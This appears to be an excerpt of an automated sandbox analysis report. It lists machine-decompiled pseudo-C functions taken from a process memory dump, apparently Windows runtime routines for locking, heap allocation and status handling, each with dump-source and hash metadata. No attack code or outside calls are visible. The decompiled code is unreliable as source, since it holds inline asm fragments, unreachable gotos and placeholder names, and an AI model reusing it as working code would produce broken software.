                        				intOrPtr _t90;
                        				intOrPtr _t92;
                        				signed int _t97;
                        				intOrPtr _t98;
                        				intOrPtr* _t99;
                        				signed int* _t101;
                        				signed int* _t102;
                        				intOrPtr* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				void* _t118;
                        
                        				_t92 = __edx;
                        				_t75 = _a4;
                        				_t98 = __ecx;
                        				_v44 = __edx;
                        				_t106 = _t75[1];
                        				_v40 = __ecx;
                        				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                        					_t82 = 0;
                        				} else {
                        					_t82 = 1;
                        				}
                        				_v5 = _t82;
                        				_t6 = _t98 + 0xc8; // 0xc9
                        				_t101 = _t6;
                        				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                        				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                        				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                        				if(_t82 != 0) {
                        					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                        					_t83 =  *_t75;
                        					_t54 = _t75[1];
                        					 *_t101 = _t83;
                        					_t84 = _t83 | _t54;
                        					_t101[1] = _t54;
                        					if(_t84 == 0) {
                        						_t101[1] = _t101[1] & _t84;
                        						 *_t101 = 1;
                        					}
                        					goto L19;
                        				} else {
                        					if(_t101 == 0) {
                        						E02B9CC50(E02B94510(0xc000000d));
                        						_t88 =  *_t101;
                        						_t97 = _t101[1];
                        						L15:
                        						_v12 = _t88;
                        						_t66 = _t88 -  *_t75;
                        						_t89 = _t97;
                        						asm("sbb ecx, [ebx+0x4]");
                        						_t118 = _t89 - _t97;
                        						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                        							_t66 = _t66 | 0xffffffff;
                        							_t89 = 0x7fffffff;
                        						}
                        						 *_t101 = _t66;
                        						_t101[1] = _t89;
                        						L19:
                        						if(E02BB7D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t58 = 0x7ffe0386;
                        						}
                        						_t102 = _v16;
                        						if( *_t58 != 0) {
                        							_t58 = E02C68ED6(_t102, _t98);
                        						}
                        						_t76 = _v44;
                        						E02BB2280(_t58, _v44);
                        						E02BBDD82(_v44, _t102, _t98);
                        						E02BBB944(_t102, _v5);
                        						return E02BAFFB0(_t76, _t98, _t76);
                        					}
                        					_t99 = 0x7ffe03b0;
                        					do {
                        						_t103 = 0x7ffe0010;
                        						do {
                        							_t67 =  *0x2c88628; // 0x0
                        							_v28 = _t67;
                        							_t68 =  *0x2c8862c; // 0x0
                        							_v32 = _t68;
                        							_v24 =  *((intOrPtr*)(_t99 + 4));
                        							_v20 =  *_t99;
                        							while(1) {
                        								_t97 =  *0x7ffe000c;
                        								_t90 =  *0x7FFE0008;
                        								if(_t97 ==  *_t103) {
                        									goto L10;
                        								}
                        								asm("pause");
                        							}
                        							L10:
                        							_t79 = _v24;
                        							_t99 = 0x7ffe03b0;
                        							_v12 =  *0x7ffe03b0;
                        							_t72 =  *0x7FFE03B4;
                        							_t103 = 0x7ffe0010;
                        							_v36 = _t72;
                        						} while (_v20 != _v12 || _t79 != _t72);
                        						_t73 =  *0x2c88628; // 0x0
                        						_t105 = _v28;
                        						_t80 =  *0x2c8862c; // 0x0
                        					} while (_t105 != _t73 || _v32 != _t80);
                        					_t98 = _v40;
                        					asm("sbb edx, [ebp-0x20]");
                        					_t88 = _t90 - _v12 - _t105;
                        					_t75 = _a4;
                        					asm("sbb edx, eax");
                        					_t31 = _t98 + 0xc8; // 0x2c5fb53
                        					_t101 = _t31;
                        					 *_t101 = _t88;
                        					_t101[1] = _t97;
                        					goto L15;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b7ca5af7ae5a755a652d9ccd8447e255ba8285323f4d4af71c945403df50363
                        • Instruction ID: a8f6a02eb76662c5353db419780ff3ecf64b6dca73a950ea574864765706e7dc
                        • Opcode Fuzzy Hash: 9b7ca5af7ae5a755a652d9ccd8447e255ba8285323f4d4af71c945403df50363
                        • Instruction Fuzzy Hash: 98519E71A00616DFCB15CFA8C490BEEBBF2FF49314F20869AD595A7340DBB5A944CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02BAEF40(intOrPtr __ecx) {
                        				char _v5;
                        				char _v6;
                        				char _v7;
                        				char _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t58;
                        				char _t59;
                        				signed char _t69;
                        				void* _t73;
                        				signed int _t74;
                        				char _t79;
                        				signed char _t81;
                        				signed int _t85;
                        				signed int _t87;
                        				intOrPtr _t90;
                        				signed char* _t91;
                        				void* _t92;
                        				signed int _t94;
                        				void* _t96;
                        
                        				_t90 = __ecx;
                        				_v16 = __ecx;
                        				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                        					_t58 =  *((intOrPtr*)(__ecx));
                        					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                        						E02B99080(_t73, __ecx, __ecx, _t92);
                        					}
                        				}
                        				_t74 = 0;
                        				_t96 =  *0x7ffe036a - 1;
                        				_v12 = 0;
                        				_v7 = 0;
                        				if(_t96 > 0) {
                        					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                        					_v12 = _t74;
                        					_v7 = _t96 != 0;
                        				}
                        				_t79 = 0;
                        				_v8 = 0;
                        				_v5 = 0;
                        				while(1) {
                        					L4:
                        					_t59 = 1;
                        					L5:
                        					while(1) {
                        						if(_t59 == 0) {
                        							L12:
                        							_t21 = _t90 + 4; // 0x779cc21e
                        							_t87 =  *_t21;
                        							_v6 = 0;
                        							if(_t79 != 0) {
                        								if((_t87 & 0x00000002) != 0) {
                        									goto L19;
                        								}
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000003;
                        								} else {
                        									_t51 = _t87 - 2; // -2
                        									_t74 = _t51;
                        								}
                        								goto L15;
                        							} else {
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000001;
                        								} else {
                        									_t26 = _t87 - 4; // -4
                        									_t74 = _t26;
                        									if((_t74 & 0x00000002) == 0) {
                        										_t74 = _t74 - 2;
                        									}
                        								}
                        								L15:
                        								if(_t74 == _t87) {
                        									L19:
                        									E02B92D8A(_t74, _t90, _t87, _t90);
                        									_t74 = _v12;
                        									_v8 = 1;
                        									if(_v7 != 0 && _t74 > 0x64) {
                        										_t74 = _t74 - 1;
                        										_v12 = _t74;
                        									}
                        									_t79 = _v5;
                        									goto L4;
                        								}
                        								asm("lock cmpxchg [esi], ecx");
                        								if(_t87 != _t87) {
                        									_t74 = _v12;
                        									_t59 = 0;
                        									_t79 = _v5;
                        									continue;
                        								}
                        								if(_v6 != 0) {
                        									_t74 = _v12;
                        									L25:
                        									if(_v7 != 0) {
                        										if(_t74 < 0x7d0) {
                        											if(_v8 == 0) {
                        												_t74 = _t74 + 1;
                        											}
                        										}
                        										_t38 = _t90 + 0x14; // 0x0
                        										_t39 = _t90 + 0x14; // 0x0
                        										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                        										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        											_t85 = _t85 & 0xff000000;
                        										}
                        										 *(_t90 + 0x14) = _t85;
                        									}
                        									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        									 *((intOrPtr*)(_t90 + 8)) = 1;
                        									return 0;
                        								}
                        								_v5 = 1;
                        								_t87 = _t74;
                        								goto L19;
                        							}
                        						}
                        						_t94 = _t74;
                        						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                        						if(_t74 == 0) {
                        							goto L12;
                        						} else {
                        							_t91 = _t90 + 4;
                        							goto L8;
                        							L9:
                        							while((_t81 & 0x00000001) != 0) {
                        								_t69 = _t81;
                        								asm("lock cmpxchg [edi], edx");
                        								if(_t69 != _t81) {
                        									_t81 = _t69;
                        									continue;
                        								}
                        								_t90 = _v16;
                        								goto L25;
                        							}
                        							asm("pause");
                        							_t94 = _t94 - 1;
                        							if(_t94 != 0) {
                        								L8:
                        								_t81 =  *_t91;
                        								goto L9;
                        							} else {
                        								_t90 = _v16;
                        								_t79 = _v5;
                        								goto L12;
                        							}
                        						}
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction ID: 6d6db6abb7f45f9a87ee0aa7ffa9c0175cc7b50dace15ccab5bf6f601430cc0d
                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction Fuzzy Hash: 7C51EF30A08249AFEB24CF68C0E17EEBBB1EF15318F1881F8D55597681C377A989C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E02C6740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                        				signed short* _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t55;
                        				void* _t56;
                        				intOrPtr* _t66;
                        				intOrPtr* _t69;
                        				void* _t74;
                        				intOrPtr* _t78;
                        				intOrPtr* _t81;
                        				intOrPtr* _t82;
                        				intOrPtr _t83;
                        				signed short* _t84;
                        				intOrPtr _t85;
                        				signed int _t87;
                        				intOrPtr* _t90;
                        				intOrPtr* _t93;
                        				intOrPtr* _t94;
                        				void* _t98;
                        
                        				_t84 = __edx;
                        				_t80 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t55 = __ecx;
                        				_v8 = __edx;
                        				_t87 =  *__edx & 0x0000ffff;
                        				_v12 = __ecx;
                        				_t3 = _t55 + 0x154; // 0x154
                        				_t93 = _t3;
                        				_t78 =  *_t93;
                        				_t4 = _t87 + 2; // 0x2
                        				_t56 = _t4;
                        				while(_t78 != _t93) {
                        					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                        						L4:
                        						_t78 =  *_t78;
                        						continue;
                        					} else {
                        						_t7 = _t78 + 0x18; // 0x18
                        						if(E02BED4F0(_t7, _t84[2], _t87) == _t87) {
                        							_t40 = _t78 + 0xc; // 0xc
                        							_t94 = _t40;
                        							_t90 =  *_t94;
                        							while(_t90 != _t94) {
                        								_t41 = _t90 + 8; // 0x8
                        								_t74 = E02BDF380(_a4, _t41, 0x10);
                        								_t98 = _t98 + 0xc;
                        								if(_t74 != 0) {
                        									_t90 =  *_t90;
                        									continue;
                        								}
                        								goto L12;
                        							}
                        							_t82 = L02BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        							if(_t82 != 0) {
                        								_t46 = _t78 + 0xc; // 0xc
                        								_t69 = _t46;
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t85 =  *_t69;
                        								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        									L20:
                        									_t82 = 3;
                        									asm("int 0x29");
                        								}
                        								 *((intOrPtr*)(_t82 + 4)) = _t69;
                        								 *_t82 = _t85;
                        								 *((intOrPtr*)(_t85 + 4)) = _t82;
                        								 *_t69 = _t82;
                        								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                        								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                        								goto L11;
                        							} else {
                        								L18:
                        								_push(0xe);
                        								_pop(0);
                        							}
                        						} else {
                        							_t84 = _v8;
                        							_t9 = _t87 + 2; // 0x2
                        							_t56 = _t9;
                        							goto L4;
                        						}
                        					}
                        					L12:
                        					return 0;
                        				}
                        				_t10 = _t87 + 0x1a; // 0x1a
                        				_t78 = L02BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                        				if(_t78 == 0) {
                        					goto L18;
                        				} else {
                        					_t12 = _t87 + 2; // 0x2
                        					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                        					_t16 = _t78 + 0x18; // 0x18
                        					E02BDF3E0(_t16, _v8[2], _t87);
                        					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                        					_t19 = _t78 + 0xc; // 0xc
                        					_t66 = _t19;
                        					 *((intOrPtr*)(_t66 + 4)) = _t66;
                        					 *_t66 = _t66;
                        					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                        					_t81 = L02BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        					if(_t81 == 0) {
                        						goto L18;
                        					} else {
                        						_t26 = _t78 + 0xc; // 0xc
                        						_t69 = _t26;
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t85 =  *_t69;
                        						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        							goto L20;
                        						} else {
                        							 *((intOrPtr*)(_t81 + 4)) = _t69;
                        							 *_t81 = _t85;
                        							 *((intOrPtr*)(_t85 + 4)) = _t81;
                        							 *_t69 = _t81;
                        							_t83 = _v12;
                        							 *(_t78 + 8) = 1;
                        							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							_t34 = _t83 + 0x154; // 0x1ba
                        							_t69 = _t34;
                        							_t85 =  *_t69;
                        							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        								goto L20;
                        							} else {
                        								 *_t78 = _t85;
                        								 *((intOrPtr*)(_t78 + 4)) = _t69;
                        								 *((intOrPtr*)(_t85 + 4)) = _t78;
                        								 *_t69 = _t78;
                        								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							}
                        						}
                        						goto L11;
                        					}
                        				}
                        				goto L12;
                        			}






















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction ID: e1699b9170c0fdc4b9062cdd9d2b4e03ea2e374ad79b355c9a1c0a2e54dba3eb
                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction Fuzzy Hash: 3D515C71600606EFDB15CF54C484AA6FBB5FF45308F1585EAE9099F212E371EA49CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E02BC2990() {
                        				signed int* _t62;
                        				signed int _t64;
                        				intOrPtr _t66;
                        				signed short* _t69;
                        				intOrPtr _t76;
                        				signed short* _t79;
                        				void* _t81;
                        				signed int _t82;
                        				signed short* _t83;
                        				signed int _t87;
                        				intOrPtr _t91;
                        				void* _t98;
                        				signed int _t99;
                        				void* _t101;
                        				signed int* _t102;
                        				void* _t103;
                        				void* _t104;
                        				void* _t107;
                        
                        				_push(0x20);
                        				_push(0x2c6ff00);
                        				E02BED08C(_t81, _t98, _t101);
                        				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                        				_t99 = 0;
                        				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                        				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                        				if(_t82 == 0) {
                        					_t62 = 0xc0000100;
                        				} else {
                        					 *((intOrPtr*)(_t103 - 4)) = 0;
                        					_t102 = 0xc0000100;
                        					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                        					_t64 = 4;
                        					while(1) {
                        						 *(_t103 - 0x24) = _t64;
                        						if(_t64 == 0) {
                        							break;
                        						}
                        						_t87 = _t64 * 0xc;
                        						 *(_t103 - 0x2c) = _t87;
                        						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2b71664));
                        						if(_t107 <= 0) {
                        							if(_t107 == 0) {
                        								_t79 = E02BDE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2b71668)), _t82);
                        								_t104 = _t104 + 0xc;
                        								__eflags = _t79;
                        								if(__eflags == 0) {
                        									_t102 = E02C151BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2b7166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                        									break;
                        								} else {
                        									_t64 =  *(_t103 - 0x24);
                        									goto L5;
                        								}
                        								goto L13;
                        							} else {
                        								L5:
                        								_t64 = _t64 - 1;
                        								continue;
                        							}
                        						}
                        						break;
                        					}
                        					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        					__eflags = _t102;
                        					if(_t102 < 0) {
                        						__eflags = _t102 - 0xc0000100;
                        						if(_t102 == 0xc0000100) {
                        							_t83 =  *((intOrPtr*)(_t103 + 8));
                        							__eflags = _t83;
                        							if(_t83 != 0) {
                        								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                        								__eflags =  *_t83 - _t99;
                        								if( *_t83 == _t99) {
                        									_t102 = 0xc0000100;
                        									goto L19;
                        								} else {
                        									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                        									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                        									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                        									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                        										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                        										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                        											L26:
                        											_t102 = E02BC2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        											__eflags = _t102 - 0xc0000100;
                        											if(_t102 != 0xc0000100) {
                        												goto L12;
                        											} else {
                        												_t99 = 1;
                        												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                        												goto L18;
                        											}
                        										} else {
                        											_t69 = E02BA6600( *((intOrPtr*)(_t91 + 0x1c)));
                        											__eflags = _t69;
                        											if(_t69 != 0) {
                        												goto L26;
                        											} else {
                        												_t83 =  *((intOrPtr*)(_t103 + 8));
                        												goto L18;
                        											}
                        										}
                        									} else {
                        										L18:
                        										_t102 = E02BC2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                        										L19:
                        										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        										goto L12;
                        									}
                        								}
                        								L28:
                        							} else {
                        								E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        								 *((intOrPtr*)(_t103 - 4)) = 1;
                        								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                        								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                        								_t76 = E02BC2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                        								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                        								__eflags = _t76 - 0xc0000100;
                        								if(_t76 == 0xc0000100) {
                        									 *((intOrPtr*)(_t103 - 0x1c)) = E02BC2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                        								}
                        								 *((intOrPtr*)(_t103 - 4)) = _t99;
                        								E02BC2ACB();
                        							}
                        						}
                        					}
                        					L12:
                        					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                        					_t62 = _t102;
                        				}
                        				L13:
                        				return E02BED0D1(_t62);
                        				goto L28;
                        			}






















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64bb4b9e6bb48b9f2baba37f6c11bc5eae66552566fbd472d7ed87b5ea5d43fe
                        • Instruction ID: b199a7f728d6765a58576e014ed2add3ad41f1d55d5ed4cdb5b47f590d5d0d16
                        • Opcode Fuzzy Hash: 64bb4b9e6bb48b9f2baba37f6c11bc5eae66552566fbd472d7ed87b5ea5d43fe
                        • Instruction Fuzzy Hash: 1B5147719002099FDF25DF58C880ADEBBB6BB48354F2580A9FC15AB260C3719952CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E02BC4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                        				signed int _v8;
                        				short _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v156;
                        				short _v158;
                        				intOrPtr _v160;
                        				char _v164;
                        				intOrPtr _v168;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t45;
                        				intOrPtr _t74;
                        				signed char _t77;
                        				intOrPtr _t84;
                        				char* _t85;
                        				void* _t86;
                        				intOrPtr _t87;
                        				signed short _t88;
                        				signed int _t89;
                        
                        				_t83 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t89;
                        				_t45 = _a8 & 0x0000ffff;
                        				_v158 = __edx;
                        				_v168 = __ecx;
                        				if(_t45 == 0) {
                        					L22:
                        					_t86 = 6;
                        					L12:
                        					E02B9CC50(_t86);
                        					L11:
                        					return E02BDB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                        				}
                        				_t77 = _a4;
                        				if((_t77 & 0x00000001) != 0) {
                        					goto L22;
                        				}
                        				_t8 = _t77 + 0x34; // 0xdce0ba00
                        				if(_t45 !=  *_t8) {
                        					goto L22;
                        				}
                        				_t9 = _t77 + 0x24; // 0x2c88504
                        				E02BB2280(_t9, _t9);
                        				_t87 = 0x78;
                        				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                        				E02BDFA60( &_v156, 0, _t87);
                        				_t13 = _t77 + 0x30; // 0x3db8
                        				_t85 =  &_v156;
                        				_v36 =  *_t13;
                        				_v28 = _v168;
                        				_v32 = 0;
                        				_v24 = 0;
                        				_v20 = _v158;
                        				_v160 = 0;
                        				while(1) {
                        					_push( &_v164);
                        					_push(_t87);
                        					_push(_t85);
                        					_push(0x18);
                        					_push( &_v36);
                        					_push(0x1e);
                        					_t88 = E02BDB0B0();
                        					if(_t88 != 0xc0000023) {
                        						break;
                        					}
                        					if(_t85 !=  &_v156) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                        					}
                        					_t84 = L02BB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                        					_v168 = _v164;
                        					if(_t84 == 0) {
                        						_t88 = 0xc0000017;
                        						goto L19;
                        					} else {
                        						_t74 = _v160 + 1;
                        						_v160 = _t74;
                        						if(_t74 >= 0x10) {
                        							L19:
                        							_t86 = E02B9CCC0(_t88);
                        							if(_t86 != 0) {
                        								L8:
                        								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                        								_t30 = _t77 + 0x24; // 0x2c88504
                        								E02BAFFB0(_t77, _t84, _t30);
                        								if(_t84 != 0 && _t84 !=  &_v156) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                        								}
                        								if(_t86 != 0) {
                        									goto L12;
                        								} else {
                        									goto L11;
                        								}
                        							}
                        							L6:
                        							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                        							if(_v164 != 0) {
                        								_t83 = _t84;
                        								E02BC4F49(_t77, _t84);
                        							}
                        							goto L8;
                        						}
                        						_t87 = _v168;
                        						continue;
                        					}
                        				}
                        				if(_t88 != 0) {
                        					goto L19;
                        				}
                        				goto L6;
                        			}



























                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4d2810d63b05138e5cd7a4c7513e9483de4090a7c03fc1962e483998614df4c
                        • Instruction ID: fd0c286edc3afe87727fec8badd5a62a5b6f4de508545f3c15eada6dff09bec7
                        • Opcode Fuzzy Hash: f4d2810d63b05138e5cd7a4c7513e9483de4090a7c03fc1962e483998614df4c
                        • Instruction Fuzzy Hash: 82419435A402289BCB21DF68C980FEA77B9EF45710F1104E9E908AB251DB74EF84CF95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02BC4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				char _v176;
                        				char _v177;
                        				char _v184;
                        				intOrPtr _v192;
                        				intOrPtr _v196;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short _t42;
                        				char* _t44;
                        				intOrPtr _t46;
                        				intOrPtr _t50;
                        				char* _t57;
                        				intOrPtr _t59;
                        				intOrPtr _t67;
                        				signed int _t69;
                        
                        				_t64 = __edx;
                        				_v12 =  *0x2c8d360 ^ _t69;
                        				_t65 = 0xa0;
                        				_v196 = __edx;
                        				_v177 = 0;
                        				_t67 = __ecx;
                        				_v192 = __ecx;
                        				E02BDFA60( &_v176, 0, 0xa0);
                        				_t57 =  &_v176;
                        				_t59 = 0xa0;
                        				if( *0x2c87bc8 != 0) {
                        					L3:
                        					while(1) {
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t67 = _v192;
                        						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                        						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                        						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                        						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                        						_push( &_v184);
                        						_push(_t59);
                        						_push(_t57);
                        						_push(0xa0);
                        						_push(_t57);
                        						_push(0xf);
                        						_t42 = E02BDB0B0();
                        						if(_t42 != 0xc0000023) {
                        							break;
                        						}
                        						if(_v177 != 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        						}
                        						_v177 = 1;
                        						_t44 = L02BB4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                        						_t59 = _v184;
                        						_t57 = _t44;
                        						if(_t57 != 0) {
                        							continue;
                        						} else {
                        							_t42 = 0xc0000017;
                        							break;
                        						}
                        					}
                        					if(_t42 != 0) {
                        						_t65 = E02B9CCC0(_t42);
                        						if(_t65 != 0) {
                        							L10:
                        							if(_v177 != 0) {
                        								if(_t57 != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        								}
                        							}
                        							_t46 = _t65;
                        							L12:
                        							return E02BDB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                        						}
                        						L7:
                        						_t50 = _a4;
                        						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                        						if(_t50 != 3) {
                        							if(_t50 == 2) {
                        								goto L8;
                        							}
                        							L9:
                        							if(E02BDF380(_t67 + 0xc, 0x2b75138, 0x10) == 0) {
                        								 *0x2c860d8 = _t67;
                        							}
                        							goto L10;
                        						}
                        						L8:
                        						_t64 = _t57 + 0x28;
                        						E02BC4F49(_t67, _t57 + 0x28);
                        						goto L9;
                        					}
                        					_t65 = 0;
                        					goto L7;
                        				}
                        				if(E02BC4E70(0x2c886b0, 0x2bc5690, 0, 0) != 0) {
                        					_t46 = E02B9CCC0(_t56);
                        					goto L12;
                        				} else {
                        					_t59 = 0xa0;
                        					goto L3;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
